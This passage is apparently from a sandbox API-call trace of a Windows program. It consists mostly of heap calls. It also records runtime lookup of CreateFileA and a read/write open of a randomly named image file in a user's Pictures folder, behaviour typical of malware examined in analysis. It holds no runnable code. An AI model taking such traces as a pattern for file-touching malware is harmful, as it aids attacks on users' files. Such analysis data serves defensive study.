Flags=0x0, Size=0x10) returned 0x9bd888 [0189.553] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0189.553] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0189.553] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda80 [0189.554] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0189.554] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0189.554] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0189.554] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0189.554] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea10 [0189.554] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0189.554] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda80 [0189.554] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0189.554] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1aa0 [0189.554] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd888 [0189.554] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0189.554] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0189.554] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0189.554] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0189.554] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1aa0 [0189.554] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd888 [0189.554] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0189.554] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b30 [0189.554] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda80 [0189.554] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0189.554] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0189.554] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0189.554] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0189.554] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b30 [0189.554] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda80 [0189.554] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0189.554] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0189.554] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd888 [0189.555] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0189.555] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0189.555] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0189.555] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0189.555] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0189.555] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd888 [0189.555] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0189.555] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0189.555] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda80 [0189.555] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0189.555] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0189.555] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0189.555] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0189.555] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0189.555] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda80 [0189.555] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0189.555] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0189.555] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd888 [0189.555] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0189.555] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0189.555] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0189.555] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0189.555] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0189.555] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd888 [0189.555] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0189.555] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0189.555] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda80 [0189.555] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0189.555] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0189.555] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0189.556] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0189.556] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0189.556] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda80 [0189.556] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0189.556] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0189.556] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd888 [0189.556] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0189.556] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0189.556] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0189.556] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0189.556] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0189.556] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd888 [0189.556] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0189.556] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0189.556] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xb) returned 0x9bda80 [0189.556] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x9bda80, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFile", lpUsedDefaultChar=0x0) returned 11 [0189.556] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0189.556] GetProcAddress (hModule=0x75990000, lpProcName="CreateFile") returned 0x0 [0189.556] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0189.556] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0189.556] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0189.556] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de970 [0189.557] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd888 [0189.557] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0189.557] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0189.557] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bda80 [0189.557] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x9bda80, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileA", lpUsedDefaultChar=0x0) returned 12 [0189.557] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0189.557] GetProcAddress (hModule=0x75990000, lpProcName="CreateFileA") returned 0x759a53c6 [0189.557] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0189.557] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0189.557] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de970 | out: hHeap=0x8a0000) returned 1 [0189.557] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0189.557] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de970 [0189.557] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0189.557] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0189.557] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0189.557] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0189.557] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0189.557] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0189.557] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18b0 [0189.557] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10001) returned 0xbca008 [0189.557] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\P8P2Fux.gif", cchWideChar=81, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 81 [0189.557] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x51) returned 0x8c4a48 [0189.557] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\P8P2Fux.gif", cchWideChar=81, lpMultiByteStr=0x8c4a48, cbMultiByte=81, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\P8P2Fux.gif", lpUsedDefaultChar=0x0) returned 81 [0189.557] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8c4a48 | out: hHeap=0x8a0000) returned 1 [0189.557] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0189.557] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0189.558] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0189.558] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0189.558] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0189.558] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0189.558] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0189.558] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de970 | out: hHeap=0x8a0000) returned 1 [0189.558] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\P8P2Fux.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\gx6xg0mp-oop8lyh\\e hluvffklat\\p8p2fux.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x160 [0189.558] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18b0 [0189.558] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e83b8 [0189.558] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de970 [0189.558] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd888 [0189.558] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda80 [0189.558] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba228 [0189.558] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0189.559] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba228 | out: hHeap=0x8a0000) returned 1 [0189.559] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0189.559] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0189.559] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda80 [0189.559] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba228 [0189.559] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd918 [0189.559] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0189.559] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0xbca008, cbMultiByte=81, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 81 [0189.559] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xa2) returned 0x8fcbc0 [0189.559] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0xbca008, cbMultiByte=81, lpWideCharStr=0x8fcbc0, cchWideChar=81 | out: lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\P8P2Fux.gif") returned 81 [0189.559] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd918 | out: hHeap=0x8a0000) returned 1 [0189.559] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xb0) returned 0x8e6e48 [0189.559] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8fcbc0 | out: hHeap=0x8a0000) returned 1 [0189.559] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbca008 | out: hHeap=0x8a0000) returned 1 [0189.559] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd918 [0189.559] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9d8 [0189.559] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3f0 [0189.559] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0189.559] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3f0 | out: hHeap=0x8a0000) returned 1 [0189.559] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0189.559] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9d8 | out: hHeap=0x8a0000) returned 1 [0189.559] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9d8 [0189.559] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3f0 [0189.559] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda98 [0189.559] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0189.559] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda98 | out: hHeap=0x8a0000) returned 1 [0189.559] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0189.559] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3f0 | out: hHeap=0x8a0000) returned 1 [0189.559] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3f0 [0189.559] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda98 [0189.560] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f58 [0189.560] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0189.560] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f58 | out: hHeap=0x8a0000) returned 1 [0189.560] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0189.560] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda98 | out: hHeap=0x8a0000) returned 1 [0189.560] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda98 [0189.560] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f58 [0189.560] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd870 [0189.560] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0189.560] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd870 | out: hHeap=0x8a0000) returned 1 [0189.560] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0189.560] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f58 | out: hHeap=0x8a0000) returned 1 [0189.560] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f58 [0189.560] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd870 [0189.560] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd528 [0189.560] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0189.560] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd528 | out: hHeap=0x8a0000) returned 1 [0189.560] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0189.560] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd870 | out: hHeap=0x8a0000) returned 1 [0189.560] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd870 [0189.560] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd528 [0189.560] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4f8 [0189.560] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0189.560] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4f8 | out: hHeap=0x8a0000) returned 1 [0189.560] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0189.560] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd528 | out: hHeap=0x8a0000) returned 1 [0189.560] FreeLibrary (hLibModule=0x75990000) returned 1 [0189.560] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0189.561] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0189.561] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0189.561] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0189.561] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0189.561] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0189.561] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0189.561] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea10 | out: hHeap=0x8a0000) returned 1 [0189.561] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0189.561] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0189.561] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd630 | out: hHeap=0x8a0000) returned 1 [0189.561] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0189.561] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0189.561] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0189.561] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5b8 | out: hHeap=0x8a0000) returned 1 [0189.561] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd738 | out: hHeap=0x8a0000) returned 1 [0189.561] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fd0 | out: hHeap=0x8a0000) returned 1 [0189.561] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd768 | out: hHeap=0x8a0000) returned 1 [0189.561] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba180 | out: hHeap=0x8a0000) returned 1 [0189.561] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd648 | out: hHeap=0x8a0000) returned 1 [0189.561] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd378 | out: hHeap=0x8a0000) returned 1 [0189.561] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9c0 | out: hHeap=0x8a0000) returned 1 [0189.561] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd360 | out: hHeap=0x8a0000) returned 1 [0189.561] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd420 | out: hHeap=0x8a0000) returned 1 [0189.561] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0189.561] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0189.561] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5a0 | out: hHeap=0x8a0000) returned 1 [0189.562] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0189.562] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd720 | out: hHeap=0x8a0000) returned 1 [0189.562] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba078 | out: hHeap=0x8a0000) returned 1 [0189.562] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd588 | out: hHeap=0x8a0000) returned 1 [0189.562] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdaf8 | out: hHeap=0x8a0000) returned 1 [0189.562] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd468 | out: hHeap=0x8a0000) returned 1 [0189.562] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd438 | out: hHeap=0x8a0000) returned 1 [0189.562] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0189.562] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b50 | out: hHeap=0x8a0000) returned 1 [0189.562] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0189.562] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd900 | out: hHeap=0x8a0000) returned 1 [0189.562] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c0c88 | out: hHeap=0x8a0000) returned 1 [0189.562] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0189.562] RtlAllocateHeap (HeapHandle=0x8a0000, 